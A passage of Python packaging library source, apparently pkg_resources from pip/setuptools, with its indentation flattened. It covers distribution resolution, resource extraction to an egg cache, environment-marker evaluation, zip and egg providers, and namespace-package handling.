list(map(shadow_set.add, resolvees))
distributions.update(dict.fromkeys(resolvees))
# success, no need to try any more versions of this project
break
distributions = list(distributions)
distributions.sort()
return distributions, error_info
def require(self, *requirements):
"""Ensure that distributions matching `requirements` are activated
`requirements` must be a string or a (possibly-nested) sequence
thereof, specifying the distributions and versions required. The
return value is a sequence of the distributions that needed to be
activated to fulfill the requirements; all relevant distributions are
included, even if they were already activated in this working set.
"""
needed = self.resolve(parse_requirements(requirements))
for dist in needed:
self.add(dist)
return needed
def subscribe(self, callback):
"""Invoke `callback` for all distributions (including existing ones)"""
if callback in self.callbacks:
return
self.callbacks.append(callback)
for dist in self:
callback(dist)
def _added_new(self, dist):
for callback in self.callbacks:
callback(dist)
def __getstate__(self):
return (
self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
self.callbacks[:]
)
def __setstate__(self, e_k_b_c):
entries, keys, by_key, callbacks = e_k_b_c
self.entries = entries[:]
self.entry_keys = keys.copy()
self.by_key = by_key.copy()
self.callbacks = callbacks[:]
class Environment(object):
"""Searchable snapshot of distributions on a search path"""
def __init__(self, search_path=None, platform=get_supported_platform(),
python=PY_MAJOR):
"""Snapshot distributions available on a search path
Any distributions found on `search_path` are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used.
`platform` is an optional string specifying the name of the platform
that platform-specific distributions must be compatible with. If
unspecified, it defaults to the current platform. `python` is an
optional string naming the desired version of Python (e.g. ``'3.3'``);
it defaults to the current version.
You may explicitly set `platform` (and/or `python`) to ``None`` if you
wish to map *all* distributions, not just those compatible with the
running platform or Python version.
"""
self._distmap = {}
self.platform = platform
self.python = python
self.scan(search_path)
def can_add(self, dist):
"""Is distribution `dist` acceptable for this environment?
The distribution must match the platform and python version
requirements specified when this environment was created, or False
is returned.
"""
return (self.python is None or dist.py_version is None
or dist.py_version==self.python) \
and compatible_platforms(dist.platform, self.platform)
def remove(self, dist):
"""Remove `dist` from the environment"""
self._distmap[dist.key].remove(dist)
def scan(self, search_path=None):
"""Scan `search_path` for distributions usable in this environment
Any distributions found are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used. Only distributions conforming to
the platform/python version defined at initialization are added.
"""
if search_path is None:
search_path = sys.path
for item in search_path:
for dist in find_distributions(item):
self.add(dist)
def __getitem__(self, project_name):
"""Return a newest-to-oldest list of distributions for `project_name`
Uses case-insensitive `project_name` comparison, assuming all the
project's distributions use their project's name converted to all
lowercase as their key.
"""
distribution_key = project_name.lower()
return self._distmap.get(distribution_key, [])
def add(self, dist):
"""Add `dist` if we ``can_add()`` it and it has not already been added
"""
if self.can_add(dist) and dist.has_version():
dists = self._distmap.setdefault(dist.key, [])
if dist not in dists:
dists.append(dist)
dists.sort(key=operator.attrgetter('hashcmp'), reverse=True)
def best_match(self, req, working_set, installer=None):
"""Find distribution best matching `req` and usable on `working_set`
This calls the ``find(req)`` method of the `working_set` to see if a
suitable distribution is already active. (This may raise
``VersionConflict`` if an unsuitable version of the project is already
active in the specified `working_set`.) If a suitable distribution
isn't active, this method returns the newest distribution in the
environment that meets the ``Requirement`` in `req`. If no suitable
distribution is found, and `installer` is supplied, then the result of
calling the environment's ``obtain(req, installer)`` method will be
returned.
"""
dist = working_set.find(req)
if dist is not None:
return dist
for dist in self[req.key]:
if dist in req:
return dist
# try to download/install
return self.obtain(req, installer)
def obtain(self, requirement, installer=None):
"""Obtain a distribution matching `requirement` (e.g. via download)
Obtain a distro that matches requirement (e.g. via download). In the
base ``Environment`` class, this routine just returns
``installer(requirement)``, unless `installer` is None, in which case
None is returned instead. This method is a hook that allows subclasses
to attempt other ways of obtaining a distribution before falling back
to the `installer` argument."""
if installer is not None:
return installer(requirement)
def __iter__(self):
"""Yield the unique project names of the available distributions"""
for key in self._distmap.keys():
if self[key]:
yield key
def __iadd__(self, other):
"""In-place addition of a distribution or environment"""
if isinstance(other, Distribution):
self.add(other)
elif isinstance(other, Environment):
for project in other:
for dist in other[project]:
self.add(dist)
else:
raise TypeError("Can't add %r to environment" % (other,))
return self
def __add__(self, other):
"""Add an environment or distribution to an environment"""
new = self.__class__([], platform=None, python=None)
for env in self, other:
new += env
return new
# XXX backward compatibility
AvailableDistributions = Environment
class ExtractionError(RuntimeError):
"""An error occurred extracting a resource
The following attributes are available from instances of this exception:
manager
The resource manager that raised this exception
cache_path
The base directory for resource extraction
original_error
The exception instance that caused extraction to fail
"""
class ResourceManager:
"""Manage resource extraction and packages"""
extraction_path = None
def __init__(self):
self.cached_files = {}
def resource_exists(self, package_or_requirement, resource_name):
"""Does the named resource exist?"""
return get_provider(package_or_requirement).has_resource(resource_name)
def resource_isdir(self, package_or_requirement, resource_name):
"""Is the named resource an existing directory?"""
return get_provider(package_or_requirement).resource_isdir(
resource_name
)
def resource_filename(self, package_or_requirement, resource_name):
"""Return a true filesystem path for specified resource"""
return get_provider(package_or_requirement).get_resource_filename(
self, resource_name
)
def resource_stream(self, package_or_requirement, resource_name):
"""Return a readable file-like object for specified resource"""
return get_provider(package_or_requirement).get_resource_stream(
self, resource_name
)
def resource_string(self, package_or_requirement, resource_name):
"""Return specified resource as a string"""
return get_provider(package_or_requirement).get_resource_string(
self, resource_name
)
def resource_listdir(self, package_or_requirement, resource_name):
"""List the contents of the named resource directory"""
return get_provider(package_or_requirement).resource_listdir(
resource_name
)
def extraction_error(self):
"""Give an error message for problems extracting file(s)"""
old_exc = sys.exc_info()[1]
cache_path = self.extraction_path or get_default_cache()
err = ExtractionError("""Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
%s
The Python egg cache directory is currently set to:
%s
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
)
err.manager = self
err.cache_path = cache_path
err.original_error = old_exc
raise err
def get_cache_path(self, archive_name, names=()):
"""Return absolute location in cache for `archive_name` and `names`
The parent directory of the resulting path will be created if it does
not already exist. `archive_name` should be the base filename of the
enclosing egg (which may not be the name of the enclosing zipfile!),
including its ".egg" extension. `names`, if provided, should be a
sequence of path name parts "under" the egg's extraction location.
This method should only be called by resource providers that need to
obtain an extraction location, and only for names they intend to
extract, as it tracks the generated names for possible cleanup later.
"""
extract_path = self.extraction_path or get_default_cache()
target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
try:
_bypass_ensure_directory(target_path)
except:
self.extraction_error()
self._warn_unsafe_extraction_path(extract_path)
self.cached_files[target_path] = 1
return target_path
@staticmethod
def _warn_unsafe_extraction_path(path):
"""
If the default extraction path is overridden and set to an insecure
location, such as /tmp, it opens up an opportunity for an attacker to
replace an extracted file with an unauthorized payload. Warn the user
if a known insecure location is used.
See Distribute #375 for more details.
"""
if os.name == 'nt' and not path.startswith(os.environ['windir']):
# On Windows, permissions are generally restrictive by default
# and temp directories are not writable by other users, so
# bypass the warning.
return
mode = os.stat(path).st_mode
if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
msg = ("%s is writable by group/others and vulnerable to attack "
"when "
"used with get_resource_filename. Consider a more secure "
"location (set with .set_extraction_path or the "
"PYTHON_EGG_CACHE environment variable)." % path)
warnings.warn(msg, UserWarning)
def postprocess(self, tempname, filename):
"""Perform any platform-specific postprocessing of `tempname`
This is where Mac header rewrites should be done; other platforms don't
have anything special they should do.
Resource providers should call this method ONLY after successfully
extracting a compressed resource. They must NOT call it on resources
that are already in the filesystem.
`tempname` is the current (temporary) name of the file, and `filename`
is the name it will be renamed to by the caller after this routine
returns.
"""
if os.name == 'posix':
# Make the resource executable
mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777
os.chmod(tempname, mode)
def set_extraction_path(self, path):
"""Set the base path where resources will be extracted to, if needed.
If you do not call this routine before any extractions take place, the
path defaults to the return value of ``get_default_cache()``. (Which
is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
platform-specific fallbacks. See that routine's documentation for more
details.)
Resources are extracted to subdirectories of this path based upon
information given by the ``IResourceProvider``. You may set this to a
temporary directory, but then you must call ``cleanup_resources()`` to
delete the extracted files when done. There is no guarantee that
``cleanup_resources()`` will be able to remove all extracted files.
(Note: you may not change the extraction path for a given resource
manager once resources have been extracted, unless you first call
``cleanup_resources()``.)
"""
if self.cached_files:
raise ValueError(
"Can't change extraction path, files already extracted"
)
self.extraction_path = path
def cleanup_resources(self, force=False):
"""
Delete all extracted resource files and directories, returning a list
of the file and directory names that could not be successfully removed.
This function does not have any concurrency protection, so it should
generally only be called when the extraction path is a temporary
directory exclusive to a single process. This method is not
automatically called; you must call it explicitly or register it as an
``atexit`` function if you wish to ensure cleanup of a temporary
directory used for extractions.
"""
# XXX
def get_default_cache():
"""Determine the default cache location
This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
"Application Data" directory. On all other systems, it's "~/.python-eggs".
"""
try:
return os.environ['PYTHON_EGG_CACHE']
except KeyError:
pass
if os.name!='nt':
return os.path.expanduser('~/.python-eggs')
# XXX this may be locale-specific!
app_data = 'Application Data'
app_homes = [
# best option, should be locale-safe
(('APPDATA',), None),
(('USERPROFILE',), app_data),
(('HOMEDRIVE','HOMEPATH'), app_data),
(('HOMEPATH',), app_data),
(('HOME',), None),
# 95/98/ME
(('WINDIR',), app_data),
]
for keys, subdir in app_homes:
dirname = ''
for key in keys:
if key in os.environ:
dirname = os.path.join(dirname, os.environ[key])
else:
break
else:
if subdir:
dirname = os.path.join(dirname, subdir)
return os.path.join(dirname, 'Python-Eggs')
else:
raise RuntimeError(
"Please set the PYTHON_EGG_CACHE enviroment variable"
)
def safe_name(name):
"""Convert an arbitrary string to a standard distribution name
Any runs of non-alphanumeric/. characters are replaced with a single '-'.
"""
return re.sub('[^A-Za-z0-9.]+', '-', name)
def safe_version(version):
"""
Convert an arbitrary string to a standard version string
"""
try:
# normalize the version
return str(packaging.version.Version(version))
except packaging.version.InvalidVersion:
version = version.replace(' ','.')
return re.sub('[^A-Za-z0-9.]+', '-', version)
def safe_extra(extra):
"""Convert an arbitrary string to a standard 'extra' name
Any runs of non-alphanumeric characters are replaced with a single '_',
and the result is always lowercased.
"""
return re.sub('[^A-Za-z0-9.]+', '_', extra).lower()
def to_filename(name):
"""Convert a project or version name to its filename-escaped form
Any '-' characters are currently replaced with '_'.
"""
return name.replace('-','_')
class MarkerEvaluation(object):
values = {
'os_name': lambda: os.name,
'sys_platform': lambda: sys.platform,
'python_full_version': platform.python_version,
'python_version': lambda: platform.python_version()[:3],
'platform_version': platform.version,
'platform_machine': platform.machine,
'python_implementation': platform.python_implementation,
}
@classmethod
def is_invalid_marker(cls, text):
"""
Validate text as a PEP 426 environment marker; return an exception
if invalid or False otherwise.
"""
try:
cls.evaluate_marker(text)
except SyntaxError as e:
return cls.normalize_exception(e)
return False
@staticmethod
def normalize_exception(exc):
"""
Given a SyntaxError from a marker evaluation, normalize the error
message:
- Remove indications of filename and line number.
- Replace platform-specific error messages with standard error
messages.
"""
subs = {
'unexpected EOF while parsing': 'invalid syntax',
'parenthesis is never closed': 'invalid syntax',
}
exc.filename = None
exc.lineno = None
exc.msg = subs.get(exc.msg, exc.msg)
return exc
@classmethod
def and_test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.and_, items)
@classmethod
def test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.or_, items)
@classmethod
def atom(cls, nodelist):
t = nodelist[1][0]
if t == token.LPAR:
if nodelist[2][0] == token.RPAR:
raise SyntaxError("Empty parentheses")
return cls.interpret(nodelist[2])
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@classmethod
def comparison(cls, nodelist):
if len(nodelist) > 4:
msg = "Chained comparison not allowed in environment markers"
raise SyntaxError(msg)
comp = nodelist[2][1]
cop = comp[1]
if comp[0] == token.NAME:
if len(nodelist[2]) == 3:
if cop == 'not':
cop = 'not in'
else:
cop = 'is not'
try:
cop = cls.get_op(cop)
except KeyError:
msg = repr(cop) + " operator not allowed in environment markers"
raise SyntaxError(msg)
return cop(cls.evaluate(nodelist[1]), cls.evaluate(nodelist[3]))
@classmethod
def get_op(cls, op):
ops = {
symbol.test: cls.test,
symbol.and_test: cls.and_test,
symbol.atom: cls.atom,
symbol.comparison: cls.comparison,
'not in': lambda x, y: x not in y,
'in': lambda x, y: x in y,
'==': operator.eq,
'!=': operator.ne,
'<': operator.lt,
'>': operator.gt,
'<=': operator.le,
'>=': operator.ge,
}
if hasattr(symbol, 'or_test'):
ops[symbol.or_test] = cls.test
return ops[op]
@classmethod
def evaluate_marker(cls, text, extra=None):
"""
Evaluate a PEP 426 environment marker on CPython 2.4+.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
This implementation uses the 'parser' module, which is not implemented
on
Jython and has been superseded by the 'ast' module in Python 2.6 and
later.
"""
return cls.interpret(parser.expr(text).totuple(1)[1])
@classmethod
def _markerlib_evaluate(cls, text):
"""
Evaluate a PEP 426 environment marker using markerlib.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
"""
from pip._vendor import _markerlib
# markerlib implements Metadata 1.2 (PEP 345) environment markers.
# Translate the variables to Metadata 2.0 (PEP 426).
env = _markerlib.default_environment()
for key in env.keys():
new_key = key.replace('.', '_')
env[new_key] = env.pop(key)
try:
result = _markerlib.interpret(text, env)
except NameError as e:
raise SyntaxError(e.args[0])
return result
if 'parser' not in globals():
# Fall back to less-complete _markerlib implementation if 'parser' module
# is not available.
evaluate_marker = _markerlib_evaluate
@classmethod
def interpret(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
try:
op = cls.get_op(nodelist[0])
except KeyError:
raise SyntaxError("Comparison or logical expression expected")
return op(nodelist)
@classmethod
def evaluate(cls, nodelist):
while len(nodelist)==2: nodelist = nodelist[1]
kind = nodelist[0]
name = nodelist[1]
if kind==token.NAME:
try:
op = cls.values[name]
except KeyError:
raise SyntaxError("Unknown name %r" % name)
return op()
if kind==token.STRING:
s = nodelist[1]
if not cls._safe_string(s):
raise SyntaxError(
"Only plain strings allowed in environment markers")
return s[1:-1]
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@staticmethod
def _safe_string(cand):
return (
cand[:1] in "'\"" and
not cand.startswith('"""') and
not cand.startswith("'''") and
'\\' not in cand
)
invalid_marker = MarkerEvaluation.is_invalid_marker
evaluate_marker = MarkerEvaluation.evaluate_marker
class NullProvider:
"""Try to implement resources and metadata for arbitrary PEP 302 loaders"""
egg_name = None
egg_info = None
loader = None
def __init__(self, module):
self.loader = getattr(module, '__loader__', None)
self.module_path = os.path.dirname(getattr(module, '__file__', ''))
def get_resource_filename(self, manager, resource_name):
return self._fn(self.module_path, resource_name)
def get_resource_stream(self, manager, resource_name):
return io.BytesIO(self.get_resource_string(manager, resource_name))
def get_resource_string(self, manager, resource_name):
return self._get(self._fn(self.module_path, resource_name))
def has_resource(self, resource_name):
return self._has(self._fn(self.module_path, resource_name))
def has_metadata(self, name):
return self.egg_info and self._has(self._fn(self.egg_info, name))
if sys.version_info <= (3,):
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name))
else:
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name)).decode("utf-8")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
def resource_isdir(self, resource_name):
return self._isdir(self._fn(self.module_path, resource_name))
def metadata_isdir(self, name):
return self.egg_info and self._isdir(self._fn(self.egg_info, name))
def resource_listdir(self, resource_name):
return self._listdir(self._fn(self.module_path, resource_name))
def metadata_listdir(self, name):
if self.egg_info:
return self._listdir(self._fn(self.egg_info, name))
return []
def run_script(self, script_name, namespace):
script = 'scripts/'+script_name
if not self.has_metadata(script):
raise ResolutionError("No script named %r" % script_name)
script_text = self.get_metadata(script).replace('\r\n', '\n')
script_text = script_text.replace('\r', '\n')
script_filename = self._fn(self.egg_info, script)
namespace['__file__'] = script_filename
if os.path.exists(script_filename):
source = open(script_filename).read()
code = compile(source, script_filename, 'exec')
exec(code, namespace, namespace)
else:
from linecache import cache
cache[script_filename] = (
len(script_text), 0, script_text.split('\n'), script_filename
)
script_code = compile(script_text, script_filename,'exec')
exec(script_code, namespace, namespace)
def _has(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _isdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _listdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _fn(self, base, resource_name):
if resource_name:
return os.path.join(base, *resource_name.split('/'))
return base
def _get(self, path):
if hasattr(self.loader, 'get_data'):
return self.loader.get_data(path)
raise NotImplementedError(
"Can't perform this operation for loaders without 'get_data()'"
)
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
"""Provider based on a virtual filesystem"""
def __init__(self, module):
NullProvider.__init__(self, module)
self._setup_prefix()
def _setup_prefix(self):
# we assume here that our metadata may be nested inside a "basket"
# of multiple eggs; that's why we use module_path instead of .archive
path = self.module_path
old = None
while path!=old:
if path.lower().endswith('.egg'):
self.egg_name = os.path.basename(path)
self.egg_info = os.path.join(path, 'EGG-INFO')
self.egg_root = path
break
old = path
path, base = os.path.split(path)
class DefaultProvider(EggProvider):
"""Provides access to package resources in the filesystem"""
def _has(self, path):
return os.path.exists(path)
def _isdir(self, path):
return os.path.isdir(path)
def _listdir(self, path):
return os.listdir(path)
def get_resource_stream(self, manager, resource_name):
return open(self._fn(self.module_path, resource_name), 'rb')
def _get(self, path):
with open(path, 'rb') as stream:
return stream.read()
register_loader_type(type(None), DefaultProvider)
if importlib_machinery is not None:
register_loader_type(importlib_machinery.SourceFileLoader, DefaultProvider)
class EmptyProvider(NullProvider):
"""Provider that returns nothing for all requests"""
_isdir = _has = lambda self, path: False
_get = lambda self, path: ''
_listdir = lambda self, path: []
module_path = None
def __init__(self):
pass
empty_provider = EmptyProvider()
class ZipManifests(dict):
"""
zip manifest builder
"""
@classmethod
def build(cls, path):
"""
Build a dictionary similar to the zipimport directory
caches, except instead of tuples, store ZipInfo objects.
Use a platform-specific path separator (os.sep) for the path keys
for compatibility with pypy on Windows.
"""
with ContextualZipFile(path) as zfile:
items = (
(
name.replace('/', os.sep),
zfile.getinfo(name),
)
for name in zfile.namelist()
)
return dict(items)
load = build
class MemoizedZipManifests(ZipManifests):
"""
Memoized zipfile manifests.
"""
manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime')
def load(self, path):
"""
Load a manifest at path or return a suitable manifest already loaded.
"""
path = os.path.normpath(path)
mtime = os.stat(path).st_mtime
if path not in self or self[path].mtime != mtime:
manifest = self.build(path)
self[path] = self.manifest_mod(manifest, mtime)
return self[path].manifest
class ContextualZipFile(zipfile.ZipFile):
"""
Supplement ZipFile class to support context manager for Python 2.6
"""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""
Construct a ZipFile or ContextualZipFile as appropriate
"""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
class ZipProvider(EggProvider):
"""Resource support for zips and eggs"""
eagers = None
_zip_manifests = MemoizedZipManifests()
def __init__(self, module):
EggProvider.__init__(self, module)
self.zip_pre = self.loader.archive+os.sep
def _zipinfo_name(self, fspath):
# Convert a virtual filename (full path to file) into a zipfile subpath
# usable with the zipimport directory cache for our target archive
if fspath.startswith(self.zip_pre):
return fspath[len(self.zip_pre):]
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.zip_pre)
)
def _parts(self, zip_path):
# Convert a zipfile subpath into an egg-relative path part list.
# pseudo-fs path
fspath = self.zip_pre+zip_path
if fspath.startswith(self.egg_root+os.sep):
return fspath[len(self.egg_root)+1:].split(os.sep)
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.egg_root)
)
@property
def zipinfo(self):
return self._zip_manifests.load(self.loader.archive)
def get_resource_filename(self, manager, resource_name):
if not self.egg_name:
raise NotImplementedError(
"resource_filename() only supported for .egg, not .zip"
)
# no need to lock for extraction, since we use temp names
zip_path = self._resource_to_zip(resource_name)
eagers = self._get_eager_resources()
if '/'.join(self._parts(zip_path)) in eagers:
for name in eagers:
self._extract_resource(manager, self._eager_to_zip(name))
return self._extract_resource(manager, zip_path)
@staticmethod
def _get_date_and_size(zip_stat):
size = zip_stat.file_size
# ymdhms+wday, yday, dst
date_time = zip_stat.date_time + (0, 0, -1)
# 1980 offset already done
timestamp = time.mktime(date_time)
return timestamp, size
def _extract_resource(self, manager, zip_path):
if zip_path in self._index():
for name in self._index()[zip_path]:
last = self._extract_resource(
manager, os.path.join(zip_path, name)
)
# return the extracted directory name
return os.path.dirname(last)
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not WRITE_SUPPORT:
raise IOError('"os.rename" and "os.unlink" are not supported '
'on this platform')
try:
real_path = manager.get_cache_path(
self.egg_name, self._parts(zip_path)
)
if self._is_current(real_path, zip_path):
return real_path
outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
os.write(outf, self.loader.get_data(zip_path))
os.close(outf)
utime(tmpnam, (timestamp, timestamp))
manager.postprocess(tmpnam, real_path)
try:
rename(tmpnam, real_path)
except os.error:
if os.path.isfile(real_path):
if self._is_current(real_path, zip_path):
# the file became current since it was checked above,
# so proceed.
return real_path
# Windows, del old file and retry
elif os.name=='nt':
unlink(real_path)
rename(tmpnam, real_path)
return real_path
raise
except os.error:
# report a user-friendly error
manager.extraction_error()
return real_path
def _is_current(self, file_path, zip_path):
"""
Return True if the file_path is current for this zip_path
"""
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not os.path.isfile(file_path):
return False
stat = os.stat(file_path)
if stat.st_size!=size or stat.st_mtime!=timestamp:
return False
# check that the contents match
zip_contents = self.loader.get_data(zip_path)
with open(file_path, 'rb') as f:
file_contents = f.read()
return zip_contents == file_contents
def _get_eager_resources(self):
if self.eagers is None:
eagers = []
for name in ('native_libs.txt', 'eager_resources.txt'):
if self.has_metadata(name):
eagers.extend(self.get_metadata_lines(name))
self.eagers = eagers
return self.eagers
def _index(self):
try:
return self._dirindex
except AttributeError:
ind = {}
for path in self.zipinfo:
parts = path.split(os.sep)
while parts:
parent = os.sep.join(parts[:-1])
if parent in ind:
ind[parent].append(parts[-1])
break
else:
ind[parent] = [parts.pop()]
self._dirindex = ind
return ind
def _has(self, fspath):
zip_path = self._zipinfo_name(fspath)
return zip_path in self.zipinfo or zip_path in self._index()
def _isdir(self, fspath):
return self._zipinfo_name(fspath) in self._index()
def _listdir(self, fspath):
return list(self._index().get(self._zipinfo_name(fspath), ()))
def _eager_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.egg_root, resource_name))
def _resource_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.module_path, resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
"""Metadata handler for standalone PKG-INFO files
Usage::
metadata = FileMetadata("/path/to/PKG-INFO")
This provider rejects all data and metadata requests except for PKG-INFO,
which is treated as existing, and will be the contents of the file at
the provided location.
"""
def __init__(self, path):
self.path = path
def has_metadata(self, name):
return name=='PKG-INFO'
def get_metadata(self, name):
if name=='PKG-INFO':
with open(self.path,'rU') as f:
metadata = f.read()
return metadata
raise KeyError("No metadata except PKG-INFO is available")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
"""Metadata provider for egg directories
Usage::
# Development eggs:
egg_info = "/path/to/PackageName.egg-info"
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(basedir, project_name=dist_name, metadata=metadata)
# Unpacked egg directories:
egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
dist = Distribution.from_filename(egg_path, metadata=metadata)
"""
def __init__(self, path, egg_info):
self.module_path = path
self.egg_info = egg_info
class EggMetadata(ZipProvider):
"""Metadata provider for .egg files"""
def __init__(self, importer):
"""Create a metadata provider from a zipimporter"""
self.zip_pre = importer.archive+os.sep
self.loader = importer
if importer.prefix:
self.module_path = os.path.join(importer.archive, importer.prefix)
else:
self.module_path = importer.archive
self._setup_prefix()
_declare_state('dict', _distribution_finders = {})
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
"""Yield distributions accessible via `path_item`"""
importer = get_importer(path_item)
finder = _find_adapter(_distribution_finders, importer)
return finder(importer, path_item, only)
def find_eggs_in_zip(importer, path_item, only=False):
"""
Find eggs in zip files; possibly multiple nested eggs.
"""
if importer.archive.endswith('.whl'):
# wheels are not supported with this finder
# they don't have PKG-INFO metadata, and won't ever contain eggs
return
metadata = EggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield Distribution.from_filename(path_item, metadata=metadata)
if only:
# don't yield nested distros
return
for subitem in metadata.resource_listdir('/'):
if subitem.endswith('.egg'):
subpath = os.path.join(path_item, subitem)
for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
return ()
register_finder(object, find_nothing)
def find_on_path(importer, path_item, only=False):
"""Yield distributions accessible on a sys.path directory"""
path_item = _normalize_cached(path_item)
if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
if path_item.lower().endswith('.egg'):
# unpacked egg
yield Distribution.from_filename(
path_item, metadata=PathMetadata(
path_item, os.path.join(path_item,'EGG-INFO')
)
)
else:
# scan for .egg and .egg-info in directory
for entry in os.listdir(path_item):
lower = entry.lower()
if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
fullpath = os.path.join(path_item, entry)
if os.path.isdir(fullpath):
# egg-info directory, allow getting metadata
metadata = PathMetadata(path_item, fullpath)
else:
metadata = FileMetadata(fullpath)
yield Distribution.from_location(
path_item, entry, metadata, precedence=DEVELOP_DIST
)
elif not only and lower.endswith('.egg'):
dists = find_distributions(os.path.join(path_item, entry))
for dist in dists:
yield dist
elif not only and lower.endswith('.egg-link'):
with open(os.path.join(path_item, entry)) as entry_file:
entry_lines = entry_file.readlines()
for line in entry_lines:
if not line.strip():
continue
path = os.path.join(path_item, line.rstrip())
dists = find_distributions(path)
for item in dists:
yield item
break
register_finder(pkgutil.ImpImporter, find_on_path)
if importlib_machinery is not None:
register_finder(importlib_machinery.FileFinder, find_on_path)
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer, path_entry, moduleName, module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
"""Ensure that named package includes a subpath of path_item (if needed)"""
importer = get_importer(path_item)
if importer is None:
return None
loader = importer.find_module(packageName)
if loader is None:
return None
module = sys.modules.get(packageName)
if module is None:
module = sys.modules[packageName] = types.ModuleType(packageName)
module.__path__ = []
_set_parent_ns(packageName)
elif not hasattr(module,'__path__'):
raise TypeError("Not a package:", packageName)
handler = _find_adapter(_namespace_handlers, importer)
subpath = handler(importer, path_item, packageName, module)
if subpath is not None:
path = module.__path__
path.append(subpath)
loader.load_module(packageName)
for path_item in path:
if path_item not in module.__path__:
module.__path__.append(path_item)
return subpath
def declare_namespace(packageName):
"""Declare that package 'packageName' is a namespace package"""
_imp.acquire_lock()
try:
if packageName in _namespace_packages:
return
path, parent = sys.path, None
if '.' in packageName:
parent = '.'.join(packageName.split('.')[:-1])
declare_namespace(parent)
if parent not in _namespace_packages:
__import__(parent)
try:
path = sys.modules[parent].__path__
except AttributeError:
raise TypeError("Not a package:", parent)
# Track what packages are namespaces, so when new path items are added,
# they can be updated
_namespace_packages.setdefault(parent,[]).append(packageName)
_namespace_packages.setdefault(packageName,[])
for path_item in path:
# Ensure all the parent's path items are reflected in the child,
# if they apply
_handle_ns(packageName, path_item)
finally:
_imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
"""Ensure that previously-declared namespace packages include path_item"""
_imp.acquire_lock()
try:
for package in _namespace_packages.get(parent,()):
subpath = _handle_ns(package, path_item)
if subpath:
fixup_namespace_packages(subpath, package)
finally:
_imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
"""Compute an ns-package subpath for a filesystem or zipfile importer"""
subpath = os.path.join(path_item, packageName.split('.')[-1])
normalized = _normalize_cached(subpath)
for item in module.__path__:
if _normalize_cached(item)==normalized:
break
else:
# Only return the path if it's not already there
return subpath
register_namespace_handler(pkgutil.ImpImporter, file_ns_handler)
register_namespace_handler(zipimport.zipimporter, file_ns_handler)
if importlib_machinery is not None:
